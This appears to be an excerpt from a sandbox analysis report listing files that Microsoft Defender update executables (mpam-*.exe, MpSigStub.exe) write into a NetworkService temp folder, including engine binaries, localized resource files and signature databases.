Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ca-ES-valencia\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\vi-VN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpDlpCmd.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-ES\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-CN\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-FR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-PT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ja-JP\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\de-DE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-US\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sq-AL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpasbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\de-DE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\id-ID\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\am-ET\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sk-SK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\et-EE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\is-IS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\gl-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hr-HR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ko-KR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\DefenderCSP.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\tr-TR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpCommu.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lv-LV\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-CA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-CA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\de-DE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdDevFlt.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpClient.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\de-DE\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\NisSrv.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ka-GE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ru-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-FR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lt-LT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pl-PL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-PT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\da-DK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ko-KR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-BR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\te-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\da-DK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sk-SK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ms-MY\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mi-NZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\el-GR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ro-RO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\gu-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ca-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\th-TH\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sl-SI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sr-Latn-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ru-RU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\uk-UA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mt-MT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-FR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\he-IL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpasdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\or-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ga-IE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-BR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\km-KH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\eu-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\da-DK\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ja-JP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hu-HU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\it-IT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-US\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ug-CN\mpuxagent.dll.mui Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpAzSubmit.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\bg-BG\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-PT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sv-SE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-MX\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\kn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-US\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nl-NL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ur-PK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\it-IT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\uk-UA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ml-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pa-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ru-RU\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ko-KR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\cs-CZ\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pl-PL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ro-RO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\tr-TR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpRtp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpUxAgent.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MsMpEng.exe Jump to dropped file
